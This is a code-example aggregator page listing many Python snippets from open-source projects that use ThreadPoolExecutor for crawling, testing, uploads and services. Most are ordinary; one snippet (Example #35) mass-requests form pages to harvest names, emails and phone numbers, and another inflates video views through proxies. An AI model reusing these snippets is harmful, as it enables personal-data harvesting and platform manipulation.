Python ThreadPoolExecutor Examples, concurrent.futures.ThreadPoolExecutor Python Examples

Example #1

1

Show file

File: fetch_item_info.py Project: wiki-ai/wikiclass

def fetch_item_info(session, observations, claims, verbose=False):
    """
    Fetches information about wikidata items.

    :Parameters:
        session : :class:`mwapi.Session`
            An API session to use for querying
        observations : `iterable`(`dict`)
            A collection of observations to annotate
        claims : `list` ( `str` )
            A set of property names to look up claims for
        verbose : `bool`
            Print dots and stuff

    :Returns:
        An `iterator` of observations augmented with an `autolabel` field
        containing the requested information.  Note that observations that
        can't be found will be excluded.
    """
    batches = chunkify(observations, 25)

    executor = ThreadPoolExecutor(max_workers=4)
    _fetch_item_info = build_fetch_item_info(session, claims)

    for annotated_batch in executor.map(_fetch_item_info, batches):
        for annotated_item in annotated_batch:
            yield annotated_item
            if verbose:
                sys.stderr.write(".")
                sys.stderr.flush()

    if verbose:
        sys.stderr.write("\n")

Example #2

1

Show file

File: sbp_relay_view.py Project: asthakeshan/piksi_tools

  def _connect_rover_fired(self):
    """Handle callback for HTTP rover connections.

    """
    if not self.device_uid:
      msg = "\nDevice ID not found!\n\nConnection requires a valid Piksi device ID."
      self._prompt_setting_error(msg)
      return
    if not self.http:
      self._prompt_networking_error("\nNetworking disabled!")
      return
    try:
      _base_pragma = self.base_pragma
      if not self.http.connect_write(self.link, self.whitelist, pragma=_base_pragma):
        msg = ("\nUnable to connect to Skylark!\n\n"
               "Please check that you have a network connection.")
        self._prompt_networking_error(msg)
        self.http.close()
        self.connected_rover = False
        return
      self.connected_rover = True
      print "Connected as a base station!"
      executor = ThreadPoolExecutor(max_workers=2)
      executor.submit(self._retry_read)
    except:
      self.connected_rover = False
      import traceback
      print traceback.format_exc()

Example #3

1

Show file

File: bfs.py Project: tmajest/WikiHop

def search(rootTitle, destTitle, session, maxDepth=-1):
    ''' 
    Given the title of a wikipedia page, find how many 'hops' it takes
    to get to the given destination page.

    Uses the breadth first search algorithm.
    '''

    visited = set()

    consumerQueue = queue.Queue(MAX_CONSUMER_QUEUE_SIZE)
    consumerQueue.put(page.Page(rootTitle, session, 0))

    producerQueue = queue.Queue()

    executor = ThreadPoolExecutor(2)

    # Start thread to consume pages
    consumerArgs = [destTitle, consumerQueue, producerQueue, visited]
    consumerFuture = executor.submit(consumer, *consumerArgs)

    # Start thread to produce child pages and add them to consumer queue
    producerArgs = [consumerQueue, producerQueue, session]
    executor.submit(producer, *producerArgs)

    return consumerFuture.result()

Example #4

0

Show file

File: __main__.py Project: beirbear/HarmonicIO

def main():
    # Update configuration from the local file
    from .configuration import Setting
    Setting.read_cfg_from_file()

    # Print instance information
    print("Node name: {0}\nNode address: {1}".format(Setting.get_node_name(), Setting.get_node_addr()))

    # Reset data in the database
    from .meta_storage import MetaStorage
    meta_storage = MetaStorage()
    meta_storage.drop_database()
    meta_storage.close_connection()
    print("Clear data in the database complete.")

    # Reset data in the local storage
    from general.services import Services
    if not Services.is_folder_exist(Setting.get_local_storage()):
        Services.t_print(Setting.get_local_storage() + " does not exist! (Local Storage).")

    # Get file from the folder
    import glob
    import os
    files = glob.glob(Setting.get_local_storage() + "*")
    for file in files:
        os.remove(file)
    print("Clear {0} files in the local storage complete.".format(len(files)))

    # Create a thread for running REST service
    from concurrent.futures import ThreadPoolExecutor
    pool = ThreadPoolExecutor()
    pool.submit(run_rest_service)

Example #5

0

Show file

File: verify.py Project: swtaarrs/hhvm

def run_test_program(test_cases: List[TestCase],
                     program: str,
                     get_flags: Callable[[str], List[str]]) -> List[Result]:
    """
    Run the program and return a list of results.
    """
    def run(test_case):
        test_dir, test_name = os.path.split(test_case.file_path)
        flags = get_flags(test_dir)
        test_flags = get_test_flags(test_case.file_path)
        cmd = [program]
        if test_case.input is None:
            cmd.append(test_name)
        cmd += flags + test_flags
        if verbose:
            print('Executing', ' '.join(cmd))
        try:
            output = subprocess.check_output(
                cmd, stderr=subprocess.STDOUT, cwd=test_dir,
                universal_newlines=True, input=test_case.input)
        except subprocess.CalledProcessError as e:
            # we don't care about nonzero exit codes... for instance, type
            # errors cause hh_single_type_check to produce them
            output = e.output
        return check_result(test_case, output)

    executor = ThreadPoolExecutor(max_workers=max_workers)
    futures = [executor.submit(run, test_case) for test_case in test_cases]

    return [future.result() for future in futures]

Example #6

0

Show file

File: textures.py Project: westernx/rmantools

def txmake_all():

    executor = ThreadPoolExecutor(4)
    futures = []

    for node_type, attr in _texture_attrs:
        for node in cmds.ls(type=node_type) or ():
            src = cmds.getAttr(node + '.' + attr).strip()
            if not src:
                continue

            if src.endswith('.tex'):
                dst = src
                src = dst.rsplit('.', 1)[0]
            else:
                dst = src + '.tex'

            if not os.path.exists(src):
                print 'MISSING TEXTURE from %s.%s %s: %s' % (node_type, attr, node, src)
                continue

            if os.path.exists(dst) and os.path.getmtime(src) <= os.path.getmtime(dst):
                print 'Skipping up-to-date %s.%s %s: %s' % (node_type, attr, node, dst)
                future = None
            else:
                print 'Txmaking %s.%s %s: %s' % (node_type, attr, node, src)
                future = executor.submit(txmake, src, dst, newer=False)
            futures.append((future, node, attr, dst))

    for future, node, attr, dst in futures:
        if future:
            future.result() # Wait for it
        cmds.setAttr(node + '.' + attr, dst, type='string')

Example #7

0

Show file

File: call_ec.py Project: bizzar-e/subex

def main(cmd, args):

    logging.basicConfig(
        level=logging.INFO,
        format=("%(relativeCreated)04d %(process)05d %(threadName)-10s "
                "%(levelname)-5s %(msg)s"))

    pool = Pool(max_workers=1)

    arg1 = tmp_fname
    arg2 = 'arg2'

    stage_file_name = cmd

    if (glob_stage == 1):

        f = pool.submit(check_output, ["ec-perl", "-w", stage_file_name, args, arg2], shell=True)
        print "stage 1 started. Initiate call to" + stage_file_name
        print "Stage is " + str(glob_stage)
    else:

        f = pool.submit(check_output, ["ec-perl", stage_file_name, " ", args, arg2], shell=True)
        print "stage 2 started. Initiate call to" + stage_file_name + " " + args + " " + arg2 + "'"
        print "Stage is " + str(glob_stage)

    f.add_done_callback(callback)
    pool.shutdown(wait=False)

Example #8

0

Show file

File: updateGraph.py Project: cyisfor/fc00.org

def main():
    db.fixkeys(key_utils.to_ipv6)
    parser = argparse.ArgumentParser(description='Submit nodes and links to fc00')
    parser.add_argument('-v', '--verbose', help='increase output verbosity',
                        dest='verbose', action='store_true')
    parser.set_defaults(verbose=False)
    args = parser.parse_args()

    con = connect()

    nodes = dump_node_store(con)
    edges = {}

    get_peer_queue = queue.Queue(0)
    result_queue = queue.Queue(0)
    e = ThreadPoolExecutor(max_workers=4)
    def args():
        for ip,node in nodes.items():
            yield ip,keyFromAddr(node['addr']),node['path'],node['version']
    args = zip(*args())
    dbnodes = {}
    for peers, node_id, ip in e.map(get_peers_derp, *args):
        get_edges_for_peers(edges, peers, node_id)
        addpeersto(dbnodes,node_id,ip,peers)

        for ip, id in peers:
            addpeersto(dbnodes,id,ip)
    print('otay!')
    send_graph(dbnodes, edges)
    sys.exit(0)

Example #9

0

Show file

File: translate_api.py Project: romi123456789/dig

 def _request(self, src_lang, tgt_lang, src_texts):        
     """
     Description:
         Receive src_texts, which should be a list of texts to be
         translated. _request method calls _basic_request method for http
         request, and assembles the JSON dictionary returned by
         _basic_request. For case that _basic_request needs to be called
         multiple times, concurrent.futures package is adopt for the usage
         of threads concurrency.
     Return Value:
         String object.
     """                
     executor = ThreadPoolExecutor(max_workers=len(src_texts))
     threads = []        
     for src_text in src_texts:                   
         future = executor.submit(
             self._basic_request,
             src_lang,
             tgt_lang,
             src_text,
         )            
         threads.append(future)
     
     # check whether all threads finished or not.
     # con_success = self._check_threads(threads)      
     #if not con_success:
     #    return "Please check your site"
     if threads[0].result() == None:
         return "Error in network!"
     
     merged_text = self._merge_text(
         [future.result() for future in threads],
     )   
         
     return merged_text

Example #10

0

Show file

File: main.py Project: yxd-hde/lambda-poll-update-delete

def handler(event, contest):
    logger.info("Start!")

    executor = ThreadPoolExecutor(max_workers=1000)
    main_loop = asyncio.new_event_loop()
    main_loop.set_default_executor(executor)
    asyncio.set_event_loop(main_loop)

    poll = Poll(main_loop)
    cal = poll.cal
    update_and_delete = UpdateAndDelete(main_loop, executor)

    table = event['table']
    queue_url = event['queueUrl']
    message_count = event['messageCount']

    poll.messages(sqs, queue_url, message_count)

    logger.info("Receive API count: {}".format(poll.fetch_count))
    logger.info("Fetched messages: {}".format(poll.message_count))

    update_and_delete.execute(sqs_client, db, queue_url, table, cal.stats)

    logger.info("Update API count: {}".format(update_and_delete.update_count))
    logger.info("Delete API count: {}".format(update_and_delete.delete_count))
    logger.info("Delete Message count: {}".format(
        update_and_delete.deleted_message_count))

    main_loop.close()
    executor.shutdown()

    return "Lambda job finished successfully."

Example #11

0

Show file

File: bili_pool2.py Project: hahahay/100quant

def play(av, n):
    proxy_list = get_proxy(n)
    executor = ThreadPoolExecutor(max_workers=n)
    play_video_av = partial(play_video_1, av=av)

    for data in executor.map(play_video_av, proxy_list):
        print("in main: 1 success".format(data))

Example #12

0

Show file

File: process.py Project: debomatic/debomatic

class ThreadPool:

    def __init__(self, workers=1):
        self._jobs = []
        self._pool = ThreadPoolExecutor(workers)

    def _finish(self, job):
        try:
            self._jobs.remove(job)
        except ValueError:
            pass
        try:
            e = job.exception()
            if e:
                raise e
        except Exception as e:
            error(str(e), exc_info=True)

    def schedule(self, func):
        job = self._pool.submit(func)
        job.add_done_callback(self._finish)
        self._jobs.append(job)

    def shutdown(self):
        for job in as_completed(self._jobs):
            job.result()
        self._pool.shutdown()

Example #13

0

Show file

File: PyDA.py Project: cherry-wb/PyDA

    def __init__(self):
        settings_manager = SettingsManager() # Set up the settings_manager

        max_workers = settings_manager.getint('application', 'max-workers') # Get the max workers from settings manager
        profiler_on = settings_manager.getint('debugging', 'profiler-on') # Get whether there is a profiler
        absolute = settings_manager.getint('save', 'absolute') # Get whether it's an absolute path
        save_path = settings_manager.get('save', 'path') # Get whether it's an absolute path
        if not absolute:
            save_path = PROJECT_PATH + os.path.sep + save_path

        executor = ThreadPoolExecutor(max_workers=max_workers, profiler_on=profiler_on) # Set up the thread executor
        dis = Disassembler(settings_manager) # Build the disassembler
        server = PyDAServer('0.0.0.0',9000) # Set up the PyDA server
        save_manager = SaveManager(save_path)

        if profiler_on:
            profile = Profile()
            profile.enable()

        app.build_and_run(settings_manager, dis, executor, server, save_manager) # Run the interface

        if profiler_on:
            profile.disable()
            stats = executor.getProfileStats()
            if stats == None:
                stats = Stats(profile)
            else:
                stats.add(profile)
            with open('profile.stats', 'wb') as statsfile:
                stats.stream = statsfile
                stats.sort_stats('cumulative').print_stats()

Example #14

0

Show file

File: verify.py Project: Orvid/hhvm

def run_test_program(files, program, expect_ext, get_flags):
    """
    Run the program and return a list of Failures.
    """
    def run(f):
        test_dir, test_name = os.path.split(f)
        flags = get_flags(test_dir)
        cmd = [program, test_name] + flags
        if verbose:
            print('Executing', ' '.join(cmd))
        try:
            output = subprocess.check_output(
                    cmd, stderr=subprocess.STDOUT, cwd=test_dir,
                    universal_newlines=True)
        except subprocess.CalledProcessError as e:
            # we don't care about nonzero exit codes... for instance, type
            # errors cause hh_single_type_check to produce them
            output = e.output
        return check_result(f, expect_ext, output)

    executor = ThreadPoolExecutor(max_workers=max_workers)
    futures = [executor.submit(run, f) for f in files]

    results = [f.result() for f in futures]
    return [r for r in results if r is not None]

Example #15

0

Show file

File: process.py Project: debomatic/debomatic

class ModulePool:

    def __init__(self, workers=1):
        self._jobs = {}
        self._pool = ThreadPoolExecutor(workers)

    def _launch(self, func, hook, dependencies):
        if dependencies:
            for dependency in dependencies:
                while True:
                    if dependency in self._jobs.keys():
                        self._jobs[dependency].result()
                        break
                    else:
                        sleep(0.1)
        func(hook)

    def schedule(self, func, hook):
        innerfunc, args, module, hookname, dependencies = hook
        job = self._pool.submit(self._launch, func, hook, dependencies)
        self._jobs[module] = job

    def shutdown(self):
        for job in as_completed([self._jobs[j] for j in self._jobs]):
            job.result()
        self._pool.shutdown()

Example #16

0

Show file

File: client.py Project: RishabhSharma1906/interop

class AsyncClient(object):
    """Client which uses the base to be more performant.

    This client uses Futures with a ThreadPoolExecutor. This allows requests to
    be executed asynchronously. Asynchronous execution with multiple Clients
    enables requests to be processed in parallel and with pipeline execution at
    the server, which can drastically improve achievable interoperability rate
    as observed at the client.

    Note that methods return Future objects. Users should handle the response
    and errors appropriately. If serial request execution is desired, ensure the
    Future response or error is received prior to making another request.
    """

    def __init__(self, url, username, password, timeout=1):
        """Create a new AsyncClient and login.

        Args:
            url: Base URL of interoperability server
                (e.g., http://localhost:8000)
            username: Interoperability username
            password: Interoperability password
            timeout: Individual session request timeout (seconds)
        """
        self.client = Client(url, username, password, timeout)

        self.server_info_executor = ThreadPoolExecutor(max_workers=1)
        self.uas_telemetry_executor = ThreadPoolExecutor(max_workers=1)
        self.obstacles_executor = ThreadPoolExecutor(max_workers=1)

    def get_server_info(self):
        """GET server information, to be displayed to judges.

        Returns:
            Future object which contains the return value or error from the
            underlying Client.
        """
        return self.server_info_executor.submit(self.client.get_server_info)

    def post_telemetry(self, telem):
        """POST new telemetry.

        Args:
            telem: Telemetry object containing telemetry state.

        Returns:
            Future object which contains the return value or error from the
            underlying Client.
        """
        return self.uas_telemetry_executor.submit(self.client.post_telemetry,
                                                  telem)

    def get_obstacles(self):
        """GET obstacles.

        Returns:
            Future object which contains the return value or error from the
            underlying Client.
        """
        return self.obstacles_executor.submit(self.client.get_obstacles)

Example #17

0

Show file

File: webclient.py Project: cxcfan/Argyi

def _getResults(runIDs, output_handler, benchmark):
    executor = ThreadPoolExecutor(MAX_SUBMISSION_THREADS)

    while len(runIDs) > 0 :
        start = time()
        runIDsFutures = {}
        failedRuns = []
        for runID in runIDs:
            state = _isFinished(runID)
            if state == "FINISHED" or state == "UNKOWN":
                run = runIDs[runID]
                future  = executor.submit(_getAndHandleResult, runID, run, output_handler, benchmark)
                runIDsFutures[future] = runID
            elif state == "ERROR":
                failedRuns.append(runID)

        # remove all finished runs from _unfinished_run_ids
        for future in as_completed(runIDsFutures.keys()):
            if future.result():
                del runIDs[runIDsFutures[future]]
                _unfinished_run_ids.remove(runIDsFutures[future])
        
        # remove failed runs from _unfinished_run_ids
        for runID in failedRuns:
            _unfinished_run_ids.remove(runID)
            del runIDs[runID]

        end = time();
        duration = end - start
        if duration < 5:
            sleep(5 - duration)

Example #18

0

Show file

File: parallel_helper_pipeline_tests.py Project: ianj-als/pypeline

 def test(no_workers, pipeline, input, state, run_function = run_pipeline):
      executor = ThreadPoolExecutor(max_workers = no_workers)
      try:
           result = run_function(executor, pipeline, input, state)
      finally:
           executor.shutdown(True)
      return result

Example #19

0

Show file

File: http_threadpool.py Project: shenxiangq/news_crawler

class HttpThreadpool(object):

    def __init__(self, max_workers=10, queue_size=200):
        self.executor = ThreadPoolExecutor(max_workers, queue_size)

    @retry(max_tries=3)
    def _download(self, url):
        req = urllib2.Request(url)
        req.add_header('User-Agent', 'Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.93 Safari/537.36')
        rsp = urllib2.urlopen(req, timeout=30)
        return rsp.read()

    def download_and_process(self, url, body_process):
        return self.executor.submit(self._download_and_process, url, body_process)

    def _download_and_process(self, url, body_process):
        body_func, body_args, body_kw = body_process
        body = self._download(url)
        try:
            body_func(body, *body_args, **body_kw)
        except Exception as e:
            print url, traceback.format_exec()

    def shutdown(self):
        self.executor.shutdown()

Example #20

0

Show file

File: run.py Project: freedesktop-unofficial-mirror/mesa__shader-db

def main():
    parser = argparse.ArgumentParser()
    parser.add_argument("shader",
                        nargs='*',
                        default=['shaders'],
                        metavar="<shader_file | shader dir>",
                        help="A shader file or directory containing shader "
                             "files. Defaults to 'shaders/'")
    args = parser.parse_args()

    os.environ["shader_precompile"] = "true"
    os.environ["allow_glsl_extension_directive_midshader"] = "true"
    if "INTEL_DEBUG" in os.environ:
        print("Warning: INTEL_DEBUG environment variable set!", file=sys.stderr)
        os.environ["INTEL_DEBUG"] += ",vs,gs,fs"
    else:
        os.environ["INTEL_DEBUG"] = "vs,gs,fs"

    try:
        os.stat("bin/glslparsertest")
    except OSError:
        print("./bin must be a symlink to a built piglit bin directory")
        sys.exit(1)

    runtimebefore = time.time()

    filenames = process_directories(args.shader)

    executor = ThreadPoolExecutor(cpu_count())
    for t in executor.map(run_test, filenames):
        sys.stdout.write(t)

    runtime = time.time() - runtimebefore
    print("shader-db run completed in {:.1f} secs".format(runtime))

Example #21

0

Show file

File: sink.py Project: subhadeepmaji/ml_algorithms

class ElasticDataSink:

    def __init__(self, name, conn, model_identifier, workers=5, bound=10000):
        self.name = name
        self.conn = conn
        self.model_identifier = model_identifier
        self.queue = Queue(maxsize=bound)
        self.pool = ThreadPoolExecutor(max_workers=workers)

    def start(self):
        self.model_identifier.model_class.init(using=self.conn)

    def __sink_item(self):
        try:
            item = self.queue.get_nowait()
            save_status = item.save(using=self.conn)
            if not save_status:
                logger.error("Error saving the item to the sink")
            else:
                logger.info("item saved to the sink")
        except Empty as e:
            logger.warn("sink queue is empty")
            logger.warn(e)

    def sink_item(self, item):
        assert isinstance(item, self.model_identifier.model_class), \
            " item must be instance of " + self.model_identifier.model_class

        try:
            self.queue.put(item, timeout=10)
            self.pool.submit(self.__sink_item)
        except Full as e:
            logger.error("sink queue is full")
            logger.error(e)

Example #22

0

Show file

File: signal_filtering.py Project: Kitchi/scipy

    def time_sosfilt(self, n_samples, threads):
        pool = ThreadPoolExecutor(max_workers=threads)
        futures = []
        for i in range(threads):
            futures.append(pool.submit(sosfilt, self.filt, self.chunks[i]))

        wait(futures)

Example #23

0

Show file

File: context.py Project: tanbro/exosip2ctypes

    def start(self, s=0, ms=50, event_executor=None):
        """Start the main loop for the context in a create thread, and then return.

        :param int s: timeout value (seconds). Passed to :meth:`event_wait` in the main loop.
        :param int ms: timeout value (seconds). Passed to :meth:`event_wait` in the main loop.
        :param concurrent.futures.Executor event_executor: Event executor instance. Events will be fired in it.
            Default is a :class:`concurrent.futures.ThreadPoolExecutor` instance
        :return: New created event loop thread.
        :rtype: threading.Thread

        This method returns soon after the main loop thread started, so it **does not block**.

        Equal to set :attr:`is_running` to `True`
        """
        self.logger.info('<0x%x>start: >>> s=%s, ms=%s', id(self), s, ms)
        if self._is_running:
            raise RuntimeError("Context loop already started.")
        if event_executor:
            self._event_executor = event_executor
        else:
            try:
                self._event_executor = ThreadPoolExecutor()
            except TypeError:  # Changed in version 3.5: If max_workers is None or not given, it will default to the number of processors on the machine, multiplied by 5
                self._event_executor = ThreadPoolExecutor(cpu_count() * 5)
        self._event_loop_thread = threading.Thread(
            target=self._event_loop, args=(s, ms))
        self._start_cond.acquire()
        self._event_loop_thread.start()
        self._start_cond.wait()
        self._start_cond.release()
        self.logger.info('<0x%x>start: <<< -> %s',
                         id(self), self._event_loop_thread)
        return self._event_loop_thread

Example #24

0

Show file

File: __init__.py Project: RNabel/CloudDrive

def upload_file(upload_file_name,
                temp_file_name='encoded.csv',
                split_file_format="{orig_file}_{id}.{orig_ext}",
                parent_folder_id='0B46HJMu9Db4xTUxhQ0x4WHpfVmM'):
    file_name = os.path.basename(upload_file_name)

    # Encode file.
    base64.encode(open(upload_file_name), open(temp_file_name, 'w+'))

    # Split file.
    num_split_files, file_names = splitfile(temp_file_name, SPLIT_SIZE, split_file_format)

    # Start upload threads.
    start = time.time()
    file_id = uuid.uuid1()
    thread_pool = ThreadPoolExecutor(max_workers=MAX_DOWNLOADS)

    for i in range(num_split_files):
        current_file_name = file_names[i]
        up_t = upload_worker.UploadWorker(index=i + 1,
                                          file_id=file_id,
                                          filename=file_name,
                                          parent_folder_id=parent_folder_id,
                                          total_file_num=num_split_files,
                                          upload_file_name=current_file_name)
        future = thread_pool.submit(up_t.run)

    # Wait for completion.
    thread_pool.shutdown()

    end = time.time()
    m, s = divmod(end - start, 60)
    print "Overall time taken: ", m, "m ", s, "s"
    return file_id

Example #25

0

Show file

File: runners.py Project: allisson/loafer

class LoaferRunner:
    def __init__(self, loop=None, max_workers=None, on_stop_callback=None):
        self._on_stop_callback = on_stop_callback
        self.loop = loop or asyncio.get_event_loop()

        # XXX: See https://github.com/python/asyncio/issues/258
        # The minimum value depends on the number of cores in the machine
        # See https://docs.python.org/3/library/concurrent.futures.html#concurrent.futures.ThreadPoolExecutor
        self._executor = ThreadPoolExecutor(max_workers)
        self.loop.set_default_executor(self._executor)

    def start(self, future=None, run_forever=True):
        start = 'starting Loafer, pid={}, run_forever={}'
        logger.info(start.format(os.getpid(), run_forever))

        self.loop.add_signal_handler(signal.SIGINT, self.stop)
        self.loop.add_signal_handler(signal.SIGTERM, self.stop)

        try:
            if run_forever:
                self.loop.run_forever()
            else:
                self.loop.run_until_complete(future)
                self.stop()
        except CancelledError:
            self.loop.close()

    def stop(self, *args, **kwargs):
        logger.info('stopping Loafer ...')
        if callable(self._on_stop_callback):
            self._on_stop_callback()

        self._executor.shutdown(wait=True)
        if self.loop.is_running():
            self.loop.stop()

Example #26

0

Show file

File: sensor_client.py Project: dawgware/stemlab

    def start_client(self):
        if self.simulate_sensor is True:
            from stemlab_client.sensors.dht22_sensor_simulator import DHT22Sensor
        else:
            from stemlab_client.sensors.dht22_sensor import DHT22Sensor

        try:
            exit_monitor = GracefulExit()
            self._load_persistent_data()
            if self._device_settings is None:
                self._setup_device()
                shelve_db = shelve.open(self._db_filename, writeback=True)
                shelve_db[self.SETTINGS_KEY] = self._device_settings
                shelve_db.close()

            sensor = DHT22Sensor(self._device_settings.device_id,
                                 units=FAHRENHEIT)
            executor = ThreadPoolExecutor(4)
            next_reading = time.time()

            while True:
                readings = sensor.poll()
                for reading in readings:
                    template = self._device_settings.measurement_templates[reading.measurement_type.name]
                    post_data = generate_measurement_params(template, reading)
                    post_future = executor.submit(post, post_data['href'], post_data['params'])
                    post_future.add_done_callback(callback_reading_post)
                next_reading += self.poll_interval
                time.sleep(next_reading - time.time())
                if exit_monitor.exit_now is True:
                    break

        except Exception as e:
            print traceback.format_exc()
            print str(e)

Example #27

0

Show file

File: helloconsumer_xmlrpc.py Project: tcalmant/ipopo

class RemoteHelloConsumer(object):
    def __init__(self):
        self._helloservice = None
        self._name = "Python"
        self._msg = "Hello Java"
        self._executor = ThreadPoolExecutor()

    @Validate
    def _validate(self, bundle_context):
        # call it!
        resp = self._helloservice.sayHello(self._name + "Sync", self._msg)
        print(
            "{0} IHello service consumer received sync response: {1}".format(
                self._name, resp
            )
        )
        # call sayHelloAsync which returns Future and we add lambda to print
        # the result when done
        self._executor.submit(
            self._helloservice.sayHelloAsync, self._name + "Async", self._msg
        ).add_done_callback(
            lambda f: print("async response: {0}".format(f.result()))
        )
        print("done with sayHelloAsync method")
        # call sayHelloAsync which returns Future and we add lambda to print
        # the result when done
        self._executor.submit(
            self._helloservice.sayHelloPromise,
            self._name + "Promise",
            self._msg,
        ).add_done_callback(
            lambda f: print("promise response: {0}".format(f.result()))
        )
        print("done with sayHelloPromise method")

Example #28

0

Show file

File: poll-raw-test.py Project: yxd-hde/lambda-poll-update-delete

def handler(event, contest):
    logger.info("Start!")

    executor = ThreadPoolExecutor(max_workers=100)

    cal = Sum()

    queue_url = event['queueUrl']
    message_count = event['messageCount']

    queue = sqs.Queue(queue_url)
    num_of_calls = message_count // batch_count

    queues = []
    for i in range(num_of_calls):
        queues.append(queue)

    message_count = 0

    responses = executor.map(one_request, queues)
    for response in responses:
        message_count += len(response)
        for msg in response:
            cal.add(msg)

    logger.info("Receive API count: {}".format(num_of_calls))
    logger.info("Fetched messages: {}".format(message_count))

    executor.shutdown()

Example #29

0

Show file

File: data_layers.py Project: jmerkow/tnarihi-caffe-helper

class BaseDataLayer(Layer):

    def setup(self, bottom, top):
        param = eval(self.param_str_)
        self.batch_size_ = param['batch_size']
        self.data_setup(bottom, top)
        top[0].reshape(*self.data_.shape)
        self.executor_ = ThreadPoolExecutor(max_workers=1)
        self.thread_ = self.executor_.submit(self.internal_thread_entry)

    def reshape(self, bottom, top):
        pass

    def forward(self, bottom, top):
        self.thread_.result()
        top[0].reshape(*self.data_.shape)
        top[0].data[...] = self.data_
        self.thread_ = self.executor_.submit(self.internal_thread_entry)

    def data_setup(self, bottom, top):
        raise NotImplementedError()

    def internal_thread_entry(self):
        raise NotImplementedError()

    def __del__(self):
        self.thread_.result()
        self.executor_.shutdown()
        super(self.__class__, self).__del__()

Example #30

0

Show file

File: writer.py Project: dgardnersf/amondawa

class ScheduledIOPool(Thread):
    """Schedule events to an IO worker pool.
    """

    def __init__(self, workers, delay):
        super(ScheduledIOPool, self).__init__()
        self.scheduler = sched.scheduler(time.time, time.sleep)
        self.thread_pool = ThreadPoolExecutor(max_workers=workers)
        self.delay = delay
        self.shutdown = False
        self.daemon = True

    def shutdown(self):
        self.shutdown = True

    # TODO shutdown
    def run(self):
        while not self.shutdown:
            try:
                self.scheduler.run()
                time.sleep(.1)    # TODO: no wait/notify when queue is empty
            except:     # TODO log
                print "Unexpected error scheduling IO:"
                traceback.print_exc()
                time.sleep(.1)
        self.thread_pool.shutdown()

    def cancel(self, event):
        return self.scheduler.cancel(event)

    def schedule(self, *args):
        return self.scheduler.enter(self.delay, 1,
                                    self.thread_pool.submit, args)

Example #31

0

Show file

from flask import jsonify
from flask_adminlte import AdminLTE
from models import AdminUser, SimulationTask, ResultsPerDay, Base
from concurrent.futures import ThreadPoolExecutor
import sys
import json
from models import db_session, engine, Base
from tasks import run_long_task
from tasks import print_exception
from sqlalchemy import func
import logging
import logging.config
from config import g_logger

#Only One Task per time
executor = ThreadPoolExecutor(1)
task_future = None


#Main function contains multiple routes
def create_rido_application(configfile=None):
    app = Flask(__name__)
    AdminLTE(app)

    current_user = AdminUser()

    @app.teardown_appcontext
    def shutdown_session(exception=None):
        db_session.remove()

    @app.before_first_request

Example #32

0

Show file

from .text import Text
from .writers import PILWriter


def _to_inches(millimeters: float) -> float:
    return millimeters / 25.4


def _to_millimeters(inches: float) -> float:
    return inches * 25.4


logger = logging.getLogger(__name__)

loop = asyncio.get_event_loop()
thread_executor = ThreadPoolExecutor()


class EmptyPageException(Exception):
    pass


class Page:

    height_inches = FunctionBindDescriptor("height", _to_inches,
                                           _to_millimeters)
    width_inches = FunctionBindDescriptor("width", _to_inches, _to_millimeters)
    resolution = FunctionBindDescriptor("dpi", _to_inches, _to_millimeters)

    def __init__(self, height: int, width: int, dpi: int, columns=1) -> None:
        self.uuid = uuid4()

Example #33

0

Show file

File: 并发编程.py Project: wqqsukida/Python_road

#     res = pp.submit(get_page, i)
#     ret.append(res)
# pp.shutdown()
# for i in ret:
#     print(i.result())

"""map提交任务"""
from concurrent.futures import ThreadPoolExecutor


def get_page(i):
    time.sleep(0.5)
    return i


pp = ThreadPoolExecutor(5)
t = pp.map(get_page, range(100))
pp.shutdown()
for i in t:
    print(i, )

"""
回调函数
"""

"""
9.6 协程
"""
"""
gevent模块
"""

Example #34

0

Show file

File: errome_dl.py Project: cinocode/dotfiles

        print('Key not found!')
        sys.exit()

sys.stdout.write('Downloading %d file(s) from %s\n' % (len(titles), album_url))
sys.stdout.flush()


# Downloads and writes to file using title
def download(url, title):
    filename = title + '.' + url.split('.')[-1]
    files = os.listdir(folder)  # List files in folder
    if filename in files:  # Skip file if already downloaded/downloading
        return

    # Download file from url
    r = requests.get(r'https://' + url[2 - len(url):], stream=True)
    with open(folder + filename, 'wb') as f:
        for chunk in r.iter_content(chunk_size=1024):
            if chunk:  # While alive
                f.write(chunk)
                f.flush()


# Download the videos, with 12 workers
with ThreadPoolExecutor(max_workers=simultaneous_workers) as executor:
    for url, title in zip(videos, titles):
        print('Downloading ' + title + '...')
        executor.submit(download, url, title)

sys.stdout.write("\n%d Downloads Finished!" % (len(videos)))

Example #35

0

Show file

    email = tree.xpath('//*[@name="tfa_2"]')[0].items()[3][1]

    #Goes to XPATH location for phone on the form and stores the information
    phone = tree.xpath('//*[@name="tfa_94"]')[0].items()[3][1]

    #If a name was found then it appends all the data it found to the master list
    if name:
        master_list.append([id, name, email, phone])
        print(f"Name: {name}")
        print(f"Email: {email}")
        print(f"Phone: {phone}")


#Creates multiple threads so python can make multiple requests to the webpage
processes = []
with ThreadPoolExecutor(max_workers=100) as executor:
    for url in url_list:
        processes.append(executor.submit(enumerate_form, url))

#Counter for iterating through excel cells
counter = 1

#Iterates through all the students in the master list and writes them to excel
for student in master_list:
    counter += 1
    sheet['A' + str(counter)].value = student[0]
    sheet['B' + str(counter)].value = student[1]
    sheet['C' + str(counter)].value = student[2]
    sheet['D' + str(counter)].value = student[3]

#Saves excel workbook

Example #36

0

Show file

from threading import Thread

import time


def task(question, paragraph):
    s = Summarizer(paragraph, maxSumarySize=3)
    result = s.get_result()
    print(question, result)
    list1.append([question, result])


if __name__ == '__main__':
    start = time.time()
    list1 = []
    pool = ThreadPoolExecutor(20)
    for item in collection.find({"category": {"$gt": 0}}):
        ########利用单线程（串行）##########
        # summar = Summarizer(paragraph, maxSumarySize=2)
        # result = summar.get_result()
        # print(result)
        # ########开多个线程###########
        #     t=Thread(target=task,args=(item.get("question"),u"{}".format(item.get("answer"))))
        #     t.start()
        # for i in range(759):
        #     t.join()
        # print(list1)
        # stop = time.time()
        # print(stop-start)
        ########利用线程池，开线程########
        pool.submit(task, item.get("question"),

Example #37

0

Show file

File: dockerspawner.py Project: asvnpr/ORNL-DCSG-JupyterHub

 def executor(self):
     """single global executor"""
     cls = self.__class__
     if cls._executor is None:
         cls._executor = ThreadPoolExecutor(1)
     return cls._executor

Example #38

0

Show file

    def test_worker_node_restart_during_pvc_clone(self, nodes,
                                                  pvc_clone_factory,
                                                  pod_factory):
        """
        Verify PVC cloning will succeed if a worker node is restarted
        while cloning is in progress

        """
